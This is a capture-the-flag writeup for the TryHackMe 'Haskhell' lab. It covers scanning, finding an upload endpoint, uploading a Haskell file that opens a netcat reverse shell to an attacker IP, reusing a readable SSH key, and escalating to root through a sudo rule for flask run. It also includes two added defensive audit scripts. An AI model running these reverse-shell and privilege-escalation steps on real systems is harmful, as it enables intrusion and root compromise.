
TryHackMe Writeup - Haskhell

THM - https://tryhackme.com/room/haskhell

Enumeration

Port scanning

As always, we start by scanning the target machine’s open ports:

┌──(root㉿kali)-[~/Desktop/thm/hakshell]
└─# rustscan -a $ip --range 1-65535 -- -A -sCV -oA $ip  -O

Results:

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD6azVu3Hr+20SblWk0j7SeT8U3VySD4u18ChyDYyOoZiza2PTe1qsuwnw06/kboHaLejqPmnxkMDWgEeXoW0L11q2D8mfSf8EVvk++7bNqQ0mlkjdcknOs11mdYqSOkM1yw06LolltKtjlf/FpT706QFkRKQO30fT4YgKY6GD71aYdafhTBgZlXA51pGyruDUOP+lqhVPvLZJnI/oOTWkv5kT0a3T+FGRZfEi+GBrhvxP7R7n3QFRSBDPKSBRYLVdlSYXPD83P1pND6F/r3BvyfHw4UY0yKbw+ntvhiRcUI2FYyN5Vj1Jrb6ipCnp5+UcFdmROOHSgWS5Qzzx5fPZB
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMx1lBsNtSWJvxM159Ahr110Jpf3M/dVqblDAoVXd8QSIEYIxEgeqTdbS4HaHPYnFyO1j8s6fQuUemJClGw3Bh8=
|   256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICPmznEBphODSYkIjIjOA+0dmQPxltUfnnCTjaYbc39R
5001/tcp open  http    syn-ack ttl 60 Gunicorn 19.7.1
|_http-title: Homepage
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET
|_http-server-header: gunicorn/19.7.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Sony X75CH-series Android TV (Android 5.0) (92%), Linux 2.6.32 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%), QNAP QTS 4.0 - 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).

Web Enumeration

From the nmap scan results, there is a web server (Gunicorn 19.7.1) running on port 5001.


Fuzzing the web server reveals a hidden endpoint, /submit.

┌──(root㉿kali)-[~/Desktop/thm/hakshell/web_fuzz]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://$ip:5001/FUZZ -ic -v -e .php,.html,.txt -o fuzz -of all

Results:

[Status: 200, Size: 237, Words: 48, Lines: 9, Duration: 1090ms]
| URL | http://10.10.185.37:5001/submit
    * FUZZ: submit

Visiting /submit shows a file upload form for submitting assignments.

Foothold

The home page explains that the students are learning the Haskell programming language and must upload their Haskell assignment programs through this site.

Save the Haskell code below to a file named rev.hs; when the server runs the submission, it sends a reverse shell back to the attacker machine.

module Main where

import System.Process

main = callCommand "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 10.17.4.74 443 >/tmp/f"

Start a listener on the attacker machine

┌──(root㉿kali)-[~/Desktop/thm/hakshell]
└─# pwncat-cs -lp 443

Now upload rev.hs through the form and click Upload.


Once the upload is processed, the listener receives a reverse shell as the flask service account user.


Lateral Movement

The home directory of the user prof contains an SSH private key.


Copy the private key to the attacker machine, save it as id_rsa.prof, and restrict the file's permissions:

┌──(root㉿kali)-[~/Desktop/thm/hakshell/ssh]
└─# chmod 600 id_rsa.prof


Run the following ssh command to log in as the user prof.

┌──(root㉿kali)-[~/Desktop/thm/hakshell/ssh]
└─# ssh prof@$ip -i id_rsa.prof


Privilege Escalation

Running sudo -ll shows that prof is allowed to run /usr/bin/flask run as root, a sudo misconfiguration.
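The rule is dangerous because flask run imports whatever module FLASK_APP names, so a user allowed to run it as root gets root code execution. The script below is added here as an example and is not part of the original writeup: a small sudoers audit that flags rules of that shape and env_keep entries that let such variables through sudo's env_reset. The ENV_DRIVEN mapping, the DANGEROUS_ENV set and the sample rules are constructed assumptions; the actual sudoers entry on the room's machine is not shown in the writeup.

```python
"""Sudoers audit for rules that hand out environment-driven commands as root.
Added example, not part of the original writeup; the mappings and sample
rules below are constructed assumptions."""
import re

# Commands whose code path is chosen by the calling user's environment or
# arguments (assumed list for illustration).
ENV_DRIVEN = {
    "/usr/bin/flask": "flask run imports the module named by FLASK_APP",
    "/usr/bin/python3": "executes any script path passed as an argument",
}

# Variables that must not survive sudo's env_reset for such rules to be safe.
DANGEROUS_ENV = {"FLASK_APP", "PYTHONPATH", "LD_PRELOAD"}

# user host=(runas) TAGS: command   e.g.  prof ALL=(root) NOPASSWD: /usr/bin/flask run
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$"
)
# Defaults env_keep += "FLASK_APP"   (also the Defaults:user form)
DEFAULTS_RE = re.compile(r'^Defaults\b.*env_keep\s*\+?=\s*"?([^"]+)"?')


def parse_rule(line):
    """Parse 'user host=(runas) TAGS: command'; return a dict, or None for other lines."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["runas"] = (d["runas"] or "root").split(":")[0].strip()  # sudo defaults to root
    d["tags"] = [t.strip() for t in d["tags"].split(":") if t.strip()]
    d["cmd"] = d["cmd"].strip()
    return d


def audit_rules(lines):
    """Return findings for env_keep lines and rules running env-driven commands as root."""
    findings = []
    for raw in lines:
        line = raw.strip()
        m = DEFAULTS_RE.match(line)
        if m:
            for var in m.group(1).split():
                if var in DANGEROUS_ENV:
                    findings.append({"kind": "env_keep", "var": var, "line": line,
                                     "reason": f"{var} survives sudo's env_reset"})
            continue
        rule = parse_rule(line)
        if rule is None or not rule["cmd"].split():
            continue
        binary = rule["cmd"].split()[0]
        if binary in ENV_DRIVEN and rule["runas"] in ("root", "ALL"):
            findings.append({"kind": "rule", "user": rule["user"], "runas": rule["runas"],
                             "cmd": rule["cmd"], "reason": ENV_DRIVEN[binary],
                             "nopasswd": "NOPASSWD" in rule["tags"],
                             "setenv": "SETENV" in rule["tags"]})
    return findings


# Constructed sample lines shaped like /etc/sudoers (not from the target machine)
SAMPLE_RULES = [
    "Defaults env_reset",
    'Defaults env_keep += "FLASK_APP"',
    "root ALL=(ALL:ALL) ALL",
    "prof ALL=(root) NOPASSWD: /usr/bin/flask run",
    "backup ALL=(root) /usr/bin/rsync -a /srv /backup",
    "dev ALL=(ALL) /usr/bin/python3 /opt/app/deploy.py",
]

if __name__ == "__main__":
    for f in audit_rules(SAMPLE_RULES):
        print(f["kind"], f.get("cmd") or f.get("var"), "-", f["reason"])
```

Feed it /etc/sudoers and the files under /etc/sudoers.d (or the output of sudo -l) to audit a real host. The remediation is to drop such rules, or to wrap the exact command in a root-owned script that sets FLASK_APP itself so the caller's environment no longer matters.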


Save the Python script below to a file named server.py:

from flask import Flask
import subprocess

app = Flask(__name__)

@app.route("/")
def hello():
    # flask is started as root through sudo, so this handler runs as root
    # and sets the setuid/setgid bits on /bin/bash
    cmd = ["chmod", "+s", "/bin/bash"]
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         stdin=subprocess.PIPE)
    out, err = p.communicate()
    return out

if __name__ == "__main__":
    app.run()


Export the environment variable so that flask loads server.py:

prof@haskhell:~$ export FLASK_APP=server.py


Now run /usr/bin/flask run as root through sudo, in the background:

prof@haskhell:~$ sudo -u root /usr/bin/flask run &


Send a curl request to the Flask server, which is listening on localhost port 5000, so that the route handler executes:

prof@haskhell:~$ curl http://127.0.0.1:5000/


Listing /bin/bash now shows the setuid bit set. Run the command below to get a root shell (-p keeps the effective privileges instead of dropping them):

prof@haskhell:~$ /bin/bash -p
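Both the lateral movement (a private key in prof's home directory readable by the web service account) and the escalation (a setuid bit on /bin/bash) leave a file-mode trail that a defender can audit. The script below is an added example and not code from the writeup: it classifies (path, mode) pairs and reports private keys with any group/other permission and setuid/setgid bits on shells, interpreters or binaries outside an allowlist. The allowlist and the sample entries are constructed assumptions.

```python
"""Audit file modes for two weaknesses this writeup relies on: an SSH private
key readable by other accounts, and a setuid/setgid bit on a shell.
Added example, not code from the original writeup; the allowlist and the
sample entries are constructed assumptions."""
import os
import stat

# Setuid binaries that are normal on an Ubuntu host (assumed allowlist).
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/bin/su",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}
# A setuid shell or interpreter is a root shell for anyone who can execute it.
SHELLS_AND_INTERPRETERS = {"bash", "sh", "dash", "zsh", "python3", "perl"}
PRIVATE_KEY_NAMES = {"id_rsa", "id_ecdsa", "id_ed25519", "id_dsa"}


def check_mode(path, mode):
    """Return a finding string for (path, st_mode), or None when nothing is wrong."""
    if not stat.S_ISREG(mode):
        return None
    name = os.path.basename(path)
    if name in PRIVATE_KEY_NAMES or name.endswith(".pem"):
        # Keys must be 0600 or tighter: any group/other bit exposes the key
        if mode & (stat.S_IRWXG | stat.S_IRWXO):
            return f"HIGH private key readable by others: {path} ({oct(stat.S_IMODE(mode))})"
        return None
    if mode & (stat.S_ISUID | stat.S_ISGID):
        if name in SHELLS_AND_INTERPRETERS:
            return f"CRITICAL setuid/setgid shell or interpreter: {path}"
        if path not in EXPECTED_SUID:
            return f"WARN unexpected setuid/setgid binary: {path}"
    return None


def audit_entries(entries):
    """entries: iterable of (path, st_mode); returns the list of findings in order."""
    findings = []
    for path, mode in entries:
        finding = check_mode(path, mode)
        if finding:
            findings.append(finding)
    return findings


def audit_dirs(dirs):
    """Walk real directories with os.lstat and audit everything found."""
    entries = []
    for top in dirs:
        for root, _subdirs, files in os.walk(top):
            for fn in files:
                path = os.path.join(root, fn)
                try:
                    entries.append((path, os.lstat(path).st_mode))
                except OSError:
                    continue  # unreadable or vanished; skip it
    return audit_entries(entries)


# Constructed sample entries (modes only, not real files from the target)
SAMPLE = [
    ("/home/prof/.ssh/id_rsa", stat.S_IFREG | 0o644),      # key readable by everyone
    ("/home/prof/.ssh/id_rsa.pub", stat.S_IFREG | 0o644),  # public key, fine
    ("/bin/bash", stat.S_IFREG | 0o6755),                  # what chmod +s /bin/bash leaves
    ("/usr/bin/sudo", stat.S_IFREG | 0o4755),              # expected setuid binary
    ("/usr/bin/ls", stat.S_IFREG | 0o755),                 # clean
    ("/opt/tool/helper", stat.S_IFREG | 0o2755),           # setgid, not allowlisted
]

if __name__ == "__main__":
    for finding in audit_entries(SAMPLE):
        print(finding)
```

audit_dirs(["/home", "/bin", "/usr/bin"]) runs the same checks over a live system; scheduling it and diffing the output against a known-good baseline turns a one-off chmod +s into an alert rather than a silent backdoor.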


A simpler way to get a root shell.

Save the Python script below as server.py instead:

import os

os.system("/bin/bash")

Execute the following commands:

prof@haskhell:~$ export FLASK_APP=server.py
prof@haskhell:~$ sudo -u root /usr/bin/flask run


This post is licensed under CC BY 4.0 by the author.